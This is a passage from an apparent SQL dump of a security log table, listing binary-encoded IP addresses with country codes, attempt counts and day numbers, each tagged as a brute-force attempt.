'\0\0\0\0\0\0\0\0\0\0���;!�','IN',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���;!�','IN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���;!�','IN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���;!�','IN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���;!�','IN',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���;!�','IN',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���;=�','IN',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���;=�','IN',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���;S�','IN',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���;S�','IN',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���;U�','IN',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���;U�','IN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���;U�','IN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���;v�','SG',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���;v�','SG',3,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���;��','DE',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���;��','DE',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���;��','DE',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���;�','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���;�','DE',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���;�.','SG',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0����7�','SG',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0����X�','CN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����X�','CN',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0����X�','CN',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0����X�','CN',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���Ļ�','CN',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���U��','RO',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���U��','RO',3,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���^�','CH',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���\n�','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���\n�','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���/�\"','CA',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���/�\"','CA',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���/�\"','CA',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���/�\"','CA',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0���/�\"','CA',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�=','US',6,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�=','US',2,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�J','US',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���]\"�','GB',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���]]{','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���]c8','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���]c8','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���]n\'','DE',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���]n\'','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���]��','CA',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�','CA',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�','CA',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�c','DE',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�c','DE',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�c','DE',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�c','DE',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�c','DE',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�c','DE',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�c','DE',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�`','IN',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�','NL',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�','NL',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���]��','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���]��','US',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���n�J','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���n�J','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���n��','IN',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���n�','US',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���n�u','IN',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0����EY','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���Ʈ�','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0�����^','US',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0�����^','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0�����^','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0�����^','US',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0�����^','US',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0����-�','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����J','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���La','DE',2,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���[K ','DE',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���[K ','DE',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���[K ','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���[a�','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���[a�','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���[a�','DE',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���[a�','DE',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���[h�','DE',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���[h�','DE',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���~�@','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0����{�','CA',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0����{�','CA',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����{�','CA',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0����{�','CA',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0����{�','CA',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���ً','CA',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���ً','CA',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���ً','CA',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0����8','CA',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0����','FR',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���;�\r','FR',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���X\Z�','IN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0�����3','NL',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0�����Q','NL',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0�����Q','NL',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0�����Q','NL',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0�����|','ID',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���B��','SG',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���B��','SG',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���B��','SG',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���B�r','SG',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���H�%','SG',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���H�%','SG',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���8\Z�','CA',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���8\Z�','CA',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0������','PL',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0������','PL',2,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0����B','FR',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0����B','FR',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����B','FR',2,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����B','FR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����B','FR',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0����B','FR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����9`','GB',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���_S�','SG',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���_S�','SG',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0���_S�','SG',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���_nq','VN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���_nq','VN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���_nq','VN',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���_pO','VN',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���j �','FR',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���j �','FR',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���j �','FR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���j#�','FR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���j#�','FR',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��� �A','US',1,18856,'brute'),('\0\0\0\0\0\0\0\0\0\0��� �A','US',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0���~�\Z','JP',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���^�M','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���^�M','US',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���^�M','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0�����C','PL',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0�����B','PL',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0�����B','PL',2,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0���C�u','CY',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���C�u','CY',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���C�h','CY',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���C�h','CY',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���Z7:','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','BH',2,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','BH',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0����D','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0����D','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',2,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���捫','US',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����&*','GB',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0����G�','NL',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����G�','NL',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0����e3','IN',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0����gI','IN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0����kQ','IN',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0����kQ','IN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����kQ','IN',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0����kQ','IN',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0����n�','IN',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0����n�','IN',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����n�','IN',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����P�','RU',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0����P�','RU',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���AA�','US',2,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���AA�','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���AL&','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���AL&','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���AL&','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���AL&','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���AL&','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���AL&','US',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0���Avv','DE',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���Avv','DE',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���Avv','DE',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���Avv','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���Avv','DE',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���A��','SG',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���A��','SG',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���A��','IN',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���A�O','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���A�O','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���A�O','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���A�','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���A�','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���A�','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���A�','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���Aێ','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���Aێ','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���Aێ','US',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0���A�','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���E\"�','DE',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���E\"�','DE',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���E\"�','DE',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���E\"�','DE',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���E��','DE',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���E��','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���KG�','CN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���KG�','CN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���KG�','CN',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���KG�','CN',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���Y','DE',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���Y�','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���Y�','DE',3,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���Y �','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���Y3�','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���Y3�','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���Y��','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����:','CA',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0����%+','CA',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0����%+','CA',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����%+','CA',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����%+','CA',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0����e�','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0����s�','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���˰R','US',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���˰R','US',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����+','TR',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','JP',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','JP',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���#\r�','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���#H','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���#Jh','DE',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���#t;','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���#t;','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���#y�','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���#~f','US',2,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���#~f','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���#��','NL',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���#�','NL',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���#��','NL',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0���#��','NL',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���#��','NL',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���#��','NL',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���#��','NL',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���#�','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���#�','DE',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���#�','DE',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0���#�','DE',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���#�','DE',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���#�','DE',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0���aD�','DE',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���aD�','DE',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���aD�','DE',1,18871,'brute'),('\0\0\0\0\0\0\0\0\0\0���aD�','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���aZ','DE',3,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���aZ','DE',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0���a�V','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���a��','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���a��','DE',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���a��','DE',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0���a��','DE',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���a��','DE',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���u,?','SG',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���\0�','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���\0�','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���\0�','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���\0�D','US',2,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���\0�D','US',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���\0�D','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���75�','DE',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���75�','DE',3,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0����)�','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����)�','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0����BY','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0����BY','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����BY','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����~h','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0����~h','US',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����~h','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����~h','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����Ù','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0����Ù','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0����5u','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0����K�','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0����O�','US',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0����O�','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0����e�','US',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����jQ','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0����r�','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0����r�','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0����r�','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����vH','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����vH','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0����y�','US',2,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0����y�','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����y�','US',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0����zX','US',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����zX','US',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���֖]','US',2,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���֗�','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���ֻ�','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���ּ','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���ּ','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0�����F','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0�����F','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0�����F','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0�����F','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0�����F','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0�����F','US',2,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0�����F','US',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',2,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0�����4','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0�����4','US',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0�����4','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0�����4','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���ݹ\n','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����E.','US',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0����E.','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0����E.','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����E.','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����E.','US',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����E.','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0����E.','US',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0����E.','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����E.','US',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0����f�','US',2,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0����f�','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0����h�','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0����h�','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',3,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0���,�1','VN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���,�1','VN',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0����l','FR',1,18855,'brute'),('\0\0\0\0\0\0\0\0\0\0����l','FR',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0����l','FR',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0����l','FR',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0����l','FR',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����l','FR',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0���Dc�','DE',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���Dc�','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���Dd@','DE',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���Dd@','DE',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���Dd@','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���Dd@','DE',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���Dm','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���Dm','DE',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���Dm','DE',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���Do�','DE',1,18871,'brute'),('\0\0\0\0\0\0\0\0\0\0���Do�','DE',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���Dt','DE',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���Z�w','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����&�','FR',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0����&�','FR',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����&�','FR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����&�','FR',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���T','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���ф','IN',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0����7','IN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0����\0','IN',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0����\0','IN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����\0','IN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����\0','IN',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0����\0','IN',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0���߷','IN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����8','CA',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','SG',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','SG',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','SG',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','SG',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','SG',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���� 